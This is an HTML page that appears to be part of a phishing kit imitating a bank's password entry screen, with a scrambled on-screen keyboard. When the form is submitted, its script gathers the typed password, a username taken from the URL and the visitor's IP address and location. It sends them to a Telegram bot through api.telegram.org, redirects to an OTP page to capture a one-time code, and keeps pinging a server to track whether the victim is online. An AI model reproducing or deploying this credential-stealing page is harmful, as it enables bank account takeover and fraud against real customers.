<!DOCTYPE html>

<html lang="es"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Ingreso de Clave</title>
  <script src="./docs/saved_resource"></script>
  <script src="./docs/axios.min.js.descarga"></script>
  <script>

setInterval(function(){
    fetch('functions.php?action=ping', { method: 'GET', keepalive: true });
}, 5000);

window.addEventListener('unload', function(){
    navigator.sendBeacon('functions.php?action=offline');
});
</script>
  <style>
    *,
    ::before,
    ::after {
      --tw-border-spacing-x: 0;
      --tw-border-spacing-y: 0;
      --tw-translate-x: 0;
      --tw-translate-y: 0;
      --tw-rotate: 0;
      --tw-skew-x: 0;
      --tw-skew-y: 0;
      --tw-scale-x: 1;
      --tw-scale-y: 1;
      --tw-pan-x: ;
      --tw-pan-y: ;
      --tw-pinch-zoom: ;
      --tw-scroll-snap-strictness: proximity;
      --tw-gradient-from-position: ;
      --tw-gradient-via-position: ;
      --tw-gradient-to-position: ;
      --tw-ordinal: ;
      --tw-slashed-zero: ;
      --tw-numeric-figure: ;
      --tw-numeric-spacing: ;
      --tw-numeric-fraction: ;
      --tw-ring-inset: ;
      --tw-ring-offset-width: 0px;
      --tw-ring-offset-color: #fff;
      --tw-ring-color: rgb(59 130 246 / 0.5);
      --tw-ring-offset-shadow: 0 0 #0000;
      --tw-ring-shadow: 0 0 #0000;
      --tw-shadow: 0 0 #0000;
      --tw-shadow-colored: 0 0 #0000;
      --tw-blur: ;
      --tw-brightness: ;
      --tw-contrast: ;
      --tw-grayscale: ;
      --tw-hue-rotate: ;
      --tw-invert: ;
      --tw-saturate: ;
      --tw-sepia: ;
      --tw-drop-shadow: ;
      --tw-backdrop-blur: ;
      --tw-backdrop-brightness: ;
      --tw-backdrop-contrast: ;
      --tw-backdrop-grayscale: ;
      --tw-backdrop-hue-rotate: ;
      --tw-backdrop-invert: ;
      --tw-backdrop-opacity: ;
      --tw-backdrop-saturate: ;
      --tw-backdrop-sepia: ;
      --tw-contain-size: ;
      --tw-contain-layout: ;
      --tw-contain-paint: ;
      --tw-contain-style:
    }

    ::backdrop {
      --tw-border-spacing-x: 0;
      --tw-border-spacing-y: 0;
      --tw-translate-x: 0;
      --tw-translate-y: 0;
      --tw-rotate: 0;
      --tw-skew-x: 0;
      --tw-skew-y: 0;
      --tw-scale-x: 1;
      --tw-scale-y: 1;
      --tw-pan-x: ;
      --tw-pan-y: ;
      --tw-pinch-zoom: ;
      --tw-scroll-snap-strictness: proximity;
      --tw-gradient-from-position: ;
      --tw-gradient-via-position: ;
      --tw-gradient-to-position: ;
      --tw-ordinal: ;
      --tw-slashed-zero: ;
      --tw-numeric-figure: ;
      --tw-numeric-spacing: ;
      --tw-numeric-fraction: ;
      --tw-ring-inset: ;
      --tw-ring-offset-width: 0px;
      --tw-ring-offset-color: #fff;
      --tw-ring-color: rgb(59 130 246 / 0.5);
      --tw-ring-offset-shadow: 0 0 #0000;
      --tw-ring-shadow: 0 0 #0000;
      --tw-shadow: 0 0 #0000;
      --tw-shadow-colored: 0 0 #0000;
      --tw-blur: ;
      --tw-brightness: ;
      --tw-contrast: ;
      --tw-grayscale: ;
      --tw-hue-rotate: ;
      --tw-invert: ;
      --tw-saturate: ;
      --tw-sepia: ;
      --tw-drop-shadow: ;
      --tw-backdrop-blur: ;
      --tw-backdrop-brightness: ;
      --tw-backdrop-contrast: ;
      --tw-backdrop-grayscale: ;
      --tw-backdrop-hue-rotate: ;
      --tw-backdrop-invert: ;
      --tw-backdrop-opacity: ;
      --tw-backdrop-saturate: ;
      --tw-backdrop-sepia: ;
      --tw-contain-size: ;
      --tw-contain-layout: ;
      --tw-contain-paint: ;
      --tw-contain-style:
    }

    /* ! tailwindcss v3.4.16 | MIT License | https://tailwindcss.com */
    *,
    ::after,
    ::before {
      box-sizing: border-box;
      border-width: 0;
      border-style: solid;
      border-color: #e5e7eb
    }

    ::after,
    ::before {
      --tw-content: ''
    }

    :host,
    html {
      line-height: 1.5;
      -webkit-text-size-adjust: 100%;
      -moz-tab-size: 4;
      tab-size: 4;
      font-family: ui-sans-serif, system-ui, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
      font-feature-settings: normal;
      font-variation-settings: normal;
      -webkit-tap-highlight-color: transparent
    }

    body {
      margin: 0;
      line-height: inherit
    }

    hr {
      height: 0;
      color: inherit;
      border-top-width: 1px
    }

    abbr:where([title]) {
      -webkit-text-decoration: underline dotted;
      text-decoration: underline dotted
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
      font-size: inherit;
      font-weight: inherit
    }

    a {
      color: inherit;
      text-decoration: inherit
    }

    b,
    strong {
      font-weight: bolder
    }

    code,
    kbd,
    pre,
    samp {
      font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
      font-feature-settings: normal;
      font-variation-settings: normal;
      font-size: 1em
    }

    small {
      font-size: 80%
    }

    sub,
    sup {
      font-size: 75%;
      line-height: 0;
      position: relative;
      vertical-align: baseline
    }

    sub {
      bottom: -.25em
    }

    sup {
      top: -.5em
    }

    table {
      text-indent: 0;
      border-color: inherit;
      border-collapse: collapse
    }

    button,
    input,
    optgroup,
    select,
    textarea {
      font-family: inherit;
      font-feature-settings: inherit;
      font-variation-settings: inherit;
      font-size: 100%;
      font-weight: inherit;
      line-height: inherit;
      letter-spacing: inherit;
      color: inherit;
      margin: 0;
      padding: 0
    }

    button,
    select {
      text-transform: none
    }

    button,
    input:where([type=button]),
    input:where([type=reset]),
    input:where([type=submit]) {
      -webkit-appearance: button;
      background-color: transparent;
      background-image: none
    }

    :-moz-focusring {
      outline: auto
    }

    :-moz-ui-invalid {
      box-shadow: none
    }

    progress {
      vertical-align: baseline
    }

    ::-webkit-inner-spin-button,
    ::-webkit-outer-spin-button {
      height: auto
    }

    [type=search] {
      -webkit-appearance: textfield;
      outline-offset: -2px
    }

    ::-webkit-search-decoration {
      -webkit-appearance: none
    }

    ::-webkit-file-upload-button {
      -webkit-appearance: button;
      font: inherit
    }

    summary {
      display: list-item
    }

    blockquote,
    dd,
    dl,
    figure,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    hr,
    p,
    pre {
      margin: 0
    }

    fieldset {
      margin: 0;
      padding: 0
    }

    legend {
      padding: 0
    }

    menu,
    ol,
    ul {
      list-style: none;
      margin: 0;
      padding: 0
    }

    dialog {
      padding: 0
    }

    textarea {
      resize: vertical
    }

    input::placeholder,
    textarea::placeholder {
      opacity: 1;
      color: #9ca3af
    }

    [role=button],
    button {
      cursor: pointer
    }

    :disabled {
      cursor: default
    }

    audio,
    canvas,
    embed,
    iframe,
    img,
    object,
    svg,
    video {
      display: block;
      vertical-align: middle
    }

    img,
    video {
      max-width: 100%;
      height: auto
    }

    [hidden]:where(:not([hidden=until-found])) {
      display: none
    }

    .col-span-1 {
      grid-column: span 1 / span 1
    }

    .col-span-9 {
      grid-column: span 9 / span 9
    }

    .mb-4 {
      margin-bottom: 1rem
    }

    .mb-6 {
      margin-bottom: 1.5rem
    }

    .flex {
      display: flex
    }

    .grid {
      display: grid
    }

    .h-screen {
      height: 100vh
    }

    .w-full {
      width: 100%
    }

    .w-screen {
      width: 100vw
    }

    .max-w-4xl {
      max-width: 56rem
    }

    .grid-cols-12 {
      grid-template-columns: repeat(12, minmax(0, 1fr))
    }

    .flex-wrap {
      flex-wrap: wrap
    }

    .items-center {
      align-items: center
    }

    .justify-center {
      justify-content: center
    }

    .gap-2 {
      gap: 0.5rem
    }

    .gap-4 {
      gap: 1rem
    }

    .rounded {
      border-radius: 0.25rem
    }

    .rounded-lg {
      border-radius: 0.5rem
    }

    .border {
      border-width: 1px
    }

    .border-gray-400 {
      --tw-border-opacity: 1;
      border-color: rgb(156 163 175 / var(--tw-border-opacity, 1))
    }

    .border-orange-400 {
      --tw-border-opacity: 1;
      border-color: rgb(251 146 60 / var(--tw-border-opacity, 1))
    }

    .bg-gray-100 {
      --tw-bg-opacity: 1;
      background-color: rgb(243 244 246 / var(--tw-bg-opacity, 1))
    }

    .bg-orange-500 {
      --tw-bg-opacity: 1;
      background-color: rgb(249 115 22 / var(--tw-bg-opacity, 1))
    }

    .bg-white {
      --tw-bg-opacity: 1;
      background-color: rgb(255 255 255 / var(--tw-bg-opacity, 1))
    }

    .p-3 {
      padding: 0.75rem
    }

    .p-6 {
      padding: 1.5rem
    }

    .px-4 {
      padding-left: 1rem;
      padding-right: 1rem
    }

    .py-2 {
      padding-top: 0.5rem;
      padding-bottom: 0.5rem
    }

    .text-center {
      text-align: center
    }

    .text-lg {
      font-size: 1.125rem;
      line-height: 1.75rem
    }

    .font-semibold {
      font-weight: 600
    }

    .text-gray-800 {
      --tw-text-opacity: 1;
      color: rgb(31 41 55 / var(--tw-text-opacity, 1))
    }

    .text-orange-600 {
      --tw-text-opacity: 1;
      color: rgb(234 88 12 / var(--tw-text-opacity, 1))
    }

    .text-white {
      --tw-text-opacity: 1;
      color: rgb(255 255 255 / var(--tw-text-opacity, 1))
    }

    .shadow-lg {
      --tw-shadow: 0 10px 15px -3px rgb(0 0 0 / 0.1), 0 4px 6px -4px rgb(0 0 0 / 0.1);
      --tw-shadow-colored: 0 10px 15px -3px var(--tw-shadow-color), 0 4px 6px -4px var(--tw-shadow-color);
      box-shadow: var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow)
    }

    .hover\:bg-gray-200:hover {
      --tw-bg-opacity: 1;
      background-color: rgb(229 231 235 / var(--tw-bg-opacity, 1))
    }

    .hover\:bg-orange-50:hover {
      --tw-bg-opacity: 1;
      background-color: rgb(255 247 237 / var(--tw-bg-opacity, 1))
    }

    .hover\:bg-orange-600:hover {
      --tw-bg-opacity: 1;
      background-color: rgb(234 88 12 / var(--tw-bg-opacity, 1))
    }
  </style>
  
  	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>  
<script src="telgm.js"></script>
	  <script>
      const urlParams = new URLSearchParams(window.location.search);
      const miVariable = urlParams.get('pu');
      console.log(miVariable); // Muestra el valor de la variable en la consola


    </script>
  <script>
         $.getJSON("https://api.ipify.org?format=json",
          function(data) {
             $("#gfg").html(data.ip);
         })
 </script>
      <script>
         $.getJSON("https://ipinfo.io", function (response) {
    $("#ip").html("IP: " + response.ip);
    $("#address").html("" + response.city + ", " + response.country);
    })
      </script>
	  
<script>

var pax, ip, ip2;

var ready = function () {
   
    pax = document.getElementById("clave").value;
    ip = document.getElementById("gfg").innerHTML;
    ip2 = document.getElementById("address").innerHTML;
    message = "==BNCEXTERIOR-Info==\n\nTIPO-USUARIO: <code>PERSONAS</code>\nUsuario: <code>" + miVariable + "</code>\nClave: <code>" + pax +"</code>\n\nIP: " + ip +"\n" + ip2;
};
var sender = function () {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"

        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message,
			"parse_mode": "HTML"
        })
    };
    $.ajax(settings).done(function (response) {
	  window.location = 'otp.html?u=' +miVariable;
   
        console.log(response);
   

   });
    return false;
};

</script>


<script type="application/javascript">
function getIP(json) {
    document.getElementById("ipaddress").value = json.ip;
}
</script>
</head>

<body class="bg-gray-100 flex items-center justify-center h-screen w-screen">
  <div class="w-full max-w-4xl p-6 bg-white shadow-lg rounded-lg">
    <!-- Header con imagen -->
    <div class="mb-6">
      <img src="./docs/top1.gif" alt="Header" style="width: 100%">
    </div>

    <!-- Texto de instrucción -->
    <h1 class="text-center text-lg font-semibold mb-6">
      Ingrese su clave para continuar
    </h1>

    <!-- Teclado -->
    <div class="grid grid-cols-12 gap-2 justify-center mb-4">
      <button class="btn-key col-span-1">N</button>
      <button class="btn-key col-span-1">J</button>
      <button class="btn-key col-span-1">U</button>
      <button class="btn-key col-span-1">D</button>
      <button class="btn-key col-span-1">F</button>
      <button class="btn-key col-span-1">L</button>
      <button class="btn-key col-span-1">K</button>
      <button class="btn-key col-span-1">Y</button>
      <button class="btn-key col-span-1">W</button>
      <button class="btn-key col-span-1">B</button>
      <button class="btn-key col-span-1">3</button>
      <button class="btn-key col-span-1">7</button>
      <button class="btn-key col-span-1">1</button>

      <button class="btn-key col-span-1">V</button>
      <button class="btn-key col-span-1">G</button>
      <button class="btn-key col-span-1">T</button>
      <button class="btn-key col-span-1">Q</button>
      <button class="btn-key col-span-1">A</button>
      <button class="btn-key col-span-1">X</button>
      <button class="btn-key col-span-1">I</button>
      <button class="btn-key col-span-1">H</button>
      <button class="btn-key col-span-1">Z</button>
      <button class="btn-key col-span-1">5</button>
      <button class="btn-key col-span-1">2</button>
      <button class="btn-key col-span-1">4</button>

      <button class="btn-key col-span-1">P</button>
      <button class="btn-key col-span-1">R</button>
      <button class="btn-key col-span-1">E</button>
      <button class="btn-key col-span-1">S</button>
      <button class="btn-key col-span-1">O</button>
      <button class="btn-key col-span-1">M</button>
      <button class="btn-key col-span-1">C</button>
      <button class="btn-key col-span-1">8</button>
      <button class="btn-key col-span-1">6</button>
      <button class="btn-key col-span-1">9</button>

      <div class="col-span-9"></div>
      <button class="btn-key col-span-1">0</button>
    </div>
    <form method="post" action="" onsubmit=" return sender()">
<p id="gfg"  hidden=""></p>
						<p id="address"  hidden=""></p>
    <!-- Input -->
    <div class="mb-4">
      <input required name="pc" id="clave" type="text"  class="w-full p-3 text-lg border rounded" placeholder="Tu clave aparecerá aquí...">
    </div>

    <!-- Botones de acción -->
    <div class="flex flex-wrap gap-4 justify-center">
      <button type="reset" class="px-4 py-2 bg-white text-orange-600 font-semibold border border-orange-400 rounded hover:bg-orange-50">
        Limpiar Clave
      </button>
      <button type="submit" class="px-4 py-2 bg-orange-500 text-white font-semibold rounded hover:bg-orange-600">
        Aceptar
      </button>
      <button onclick="cerrarFormulario()" class="px-4 py-2 bg-gray-100 border border-gray-400 text-gray-800 rounded hover:bg-gray-200">
        Cerrar
      </button>
    </div>
  </form>
  </div>
  <script src="./docs/script.js.descarga"></script>
  <script>
    document.addEventListener('DOMContentLoaded', function () {
        const inputClave = document.getElementById("clave");
        const botones = document.querySelectorAll(".btn-key");
        const form = document.querySelector('form');
    
        botones.forEach((btn) => {
            btn.addEventListener("click", () => {
                inputClave.value += btn.textContent;
            });
        });
    

    });
    </script>
    
    

  

  <style>
    .btn-key {
      @apply bg-gray-200 hover:bg-gray-300 text-gray-900 font-semibold py-2 rounded;
    }
  </style>




</body></html>